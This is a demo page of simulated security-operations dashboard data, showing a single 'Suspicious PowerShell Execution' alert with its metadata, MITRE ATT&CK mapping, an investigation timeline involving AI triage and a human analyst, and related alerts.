Interactive Demo — Simulated data only. Back to SOC in a Box
SOC365 Dashboard
Acme Legal Services Ltd Live 15:24:42 UTC

Suspicious PowerShell Execution

High Escalated
ALR-00336 · 2026-04-08T12:01:14Z

Description

Encoded PowerShell command executed on SRV-APP-01 by user 'p.thomas'. Command attempts to download and execute remote payload. Flagged by Firewall.

Alert Metadata

Alert ID
ALR-00336
Timestamp
2026-04-08T12:01:14Z
Severity
High
Status
Escalated
Detection Source
Firewall
Assigned Analyst
Marcus Webb

Endpoint Information

Hostname
SRV-APP-01
User Account
p.thomas
Source IP
103.195.216.119
Destination IP
10.0.181.173
Origin Country
CN China

MITRE ATT&CK Mapping

Tactic
Execution
Technique
T1059.001
Reference
attack.mitre.org/techniques/T1059.001

Investigation Timeline

12:01:14 Event ingested by SOC365 Engine
12:01:18 EmilyAI triage started — correlation enrichment
12:01:19 EmilyAI confidence: 89% — escalated to human analyst
12:01:59 Alert assigned to analyst: Marcus Webb
12:04:05 Investigation started — querying SIEM and threat intelligence
12:06:54 Containment action taken — endpoint isolated
12:20:14 Alert resolved — remediation complete

Related Alerts

ID Time Alert Severity Status Host
ALR-00211 16h ago Unauthorised USB Device Low False Positive SRV-APP-01
ALR-00377 17h ago Suspicious PowerShell Execution Informational Open SRV-MAIL-01
ALR-00049 17h ago Suspicious PowerShell Execution Medium False Positive WS-LAP-012
ALR-00136 19h ago Suspicious PowerShell Execution Low False Positive WS-LAP-012
ALR-00495 23h ago Privilege Escalation Attempt Low Escalated SRV-APP-01